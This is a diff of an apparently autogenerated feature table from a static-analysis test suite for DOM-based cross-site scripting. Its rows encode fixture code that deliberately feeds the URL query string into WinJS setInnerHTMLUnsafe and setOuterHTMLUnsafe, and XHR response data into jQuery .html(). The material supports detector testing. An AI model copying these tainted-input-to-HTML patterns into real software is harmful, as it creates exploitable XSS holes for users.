autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:40 | documen ... .search | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:40 | documen ... .search | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:40 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:40 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:50 | documen ... bstring | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:50 | documen ... bstring | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:50 | documen ... bstring | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:50 | documen ... bstring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:50 | documen ... bstring | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | documen ... ring(1) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | documen ... ring(1) | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | documen ... ring(1) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | documen ... ring(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | documen ... ring(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | exceptional return of documen ... ring(1) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | exceptional return of documen ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | exceptional return of documen ... ring(1) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | exceptional return of documen ... ring(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:17:2:53 | exceptional return of documen ... ring(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:26:2:33 | location | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:26:2:33 | location | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:26:2:33 | location | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:26:2:33 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:26:2:33 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:35:2:40 | search | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:35:2:40 | search | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:35:2:40 | search | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:35:2:40 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:35:2:40 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:2:42:2:50 | substring | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:42:2:50 | substring | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:2:42:2:50 | substring | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:2:42:2:50 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:2:42:2:50 | substring | fileImports | | | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | CalleeFlexibleAccessPath | document.location.search.substring | | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | contextFunctionInterfaces | test(elt) | @@ -18505,6 +126151,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/winjs.js:2:52:2:52 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:7 | WinJS | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:7 | WinJS | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:7 | WinJS | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:7 | WinJS | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:7 | WinJS | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:17 | WinJS.Utilities | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:17 | WinJS.Utilities | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:17 | WinJS.Utilities | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:17 | WinJS.Utilities | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:17 | WinJS.Utilities | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:36 | WinJS.U ... LUnsafe | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:36 | WinJS.U ... LUnsafe | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:36 | WinJS.U ... LUnsafe | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:36 | WinJS.U ... LUnsafe | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:36 | WinJS.U ... LUnsafe | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | WinJS.U ... ainted) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | WinJS.U ... ainted) | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | WinJS.U ... ainted) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | WinJS.U ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | WinJS.U ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | exceptional return of WinJS.U ... ainted) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | exceptional return of WinJS.U ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | exceptional return of WinJS.U ... ainted) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | exceptional return of WinJS.U ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:3:3:50 | exceptional return of WinJS.U ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:9:3:17 | Utilities | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:9:3:17 | Utilities | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:9:3:17 | Utilities | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:9:3:17 | Utilities | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:9:3:17 | Utilities | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:3:19:3:36 | setInnerHTMLUnsafe | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:19:3:36 | setInnerHTMLUnsafe | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:3:19:3:36 | setInnerHTMLUnsafe | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:3:19:3:36 | setInnerHTMLUnsafe | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:3:19:3:36 | setInnerHTMLUnsafe | fileImports | | | autogenerated/Xss/DomBasedXss/winjs.js:3:38:3:40 | elt | CalleeFlexibleAccessPath | WinJS.Utilities.setInnerHTMLUnsafe | | autogenerated/Xss/DomBasedXss/winjs.js:3:38:3:40 | elt | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/winjs.js:3:38:3:40 | elt | contextFunctionInterfaces | test(elt) | @@ -18519,6 +126200,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/winjs.js:3:43:3:49 | tainted | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | | autogenerated/Xss/DomBasedXss/winjs.js:3:43:3:49 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/winjs.js:3:43:3:49 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:7 | WinJS | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:7 | WinJS | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:7 | WinJS | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:7 | WinJS | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:7 | WinJS | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:17 | WinJS.Utilities | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:17 | WinJS.Utilities | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:17 | WinJS.Utilities | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:17 | WinJS.Utilities | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:17 | WinJS.Utilities | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:36 | WinJS.U ... LUnsafe | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:36 | WinJS.U ... LUnsafe | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:36 | WinJS.U ... LUnsafe | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:36 | WinJS.U ... LUnsafe | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:36 | WinJS.U ... LUnsafe | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | WinJS.U ... ainted) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | WinJS.U ... ainted) | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | WinJS.U ... ainted) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | WinJS.U ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | WinJS.U ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | exceptional return of WinJS.U ... ainted) | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | exceptional return of WinJS.U ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | exceptional return of WinJS.U ... ainted) | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | exceptional return of WinJS.U ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:3:4:50 | exceptional return of WinJS.U ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:9:4:17 | Utilities | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:9:4:17 | Utilities | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:9:4:17 | Utilities | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:9:4:17 | Utilities | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:9:4:17 | Utilities | fileImports | | +| autogenerated/Xss/DomBasedXss/winjs.js:4:19:4:36 | setOuterHTMLUnsafe | contextFunctionInterfaces | test(elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:19:4:36 | setOuterHTMLUnsafe | contextSurroundingFunctionParameters | (elt) | +| autogenerated/Xss/DomBasedXss/winjs.js:4:19:4:36 | setOuterHTMLUnsafe | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | +| autogenerated/Xss/DomBasedXss/winjs.js:4:19:4:36 | setOuterHTMLUnsafe | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/winjs.js:4:19:4:36 | setOuterHTMLUnsafe | fileImports | | | autogenerated/Xss/DomBasedXss/winjs.js:4:38:4:40 | elt | CalleeFlexibleAccessPath | WinJS.Utilities.setOuterHTMLUnsafe | | autogenerated/Xss/DomBasedXss/winjs.js:4:38:4:40 | elt | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/winjs.js:4:38:4:40 | elt | contextFunctionInterfaces | test(elt) | @@ -18533,16 +126249,143 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/winjs.js:4:43:4:49 | tainted | enclosingFunctionBody | elt tainted document location search substring 1 WinJS Utilities setInnerHTMLUnsafe elt tainted WinJS Utilities setOuterHTMLUnsafe elt tainted | | autogenerated/Xss/DomBasedXss/winjs.js:4:43:4:49 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/winjs.js:4:43:4:49 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:0 | this | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:0 | this | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:1 | $ | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:1 | $ | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | $(document) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | $(document) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | $(document) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | exceptional return of $(document) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | exceptional return of $(document) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:11 | exceptional return of $(document) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:17 | $(document).ready | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:17 | $(document).ready | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:1:17 | $(document).ready | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | $(docum ... }\\n}) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | $(docum ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | $(docum ... }\\n}) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | exceptional return of $(docum ... }\\n}) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | exceptional return of $(docum ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:1:16:2 | exceptional return of $(docum ... }\\n}) | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:3:1:10 | document | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:3:1:10 | document | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:3:1:10 | document | contextFunctionInterfaces | onreadystatechange() | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:3:1:10 | document | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:3:1:10 | document | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:13:1:17 | ready | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:13:1:17 | ready | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:13:1:17 | ready | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:18 | this | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:18 | this | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:18 | this | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:18 | this | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:19 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:19 | xhr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:19 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:19 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:1:19 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | 'arguments' object of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | 'arguments' object of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | 'arguments' object of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | exceptional return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | exceptional return of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | exceptional return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | exceptional return of anonymous function | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | functio ... }\\n} | CalleeFlexibleAccessPath | $().ready | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | functio ... }\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | functio ... }\\n} | contextFunctionInterfaces | onreadystatechange() | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | functio ... }\\n} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | functio ... }\\n} | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | return of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:1:19:16:1 | return of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:11 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr = n ... quest() | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr = n ... quest() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr = n ... quest() | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr = n ... quest() | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:9:2:34 | xhr = n ... quest() | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | exceptional return of new XMLHttpRequest() | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | exceptional return of new XMLHttpRequest() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | exceptional return of new XMLHttpRequest() | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | exceptional return of new XMLHttpRequest() | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | exceptional return of new XMLHttpRequest() | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | new XMLHttpRequest() | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | new XMLHttpRequest() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | new XMLHttpRequest() | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | new XMLHttpRequest() | enclosingFunctionName | ready#functionalargument | +| 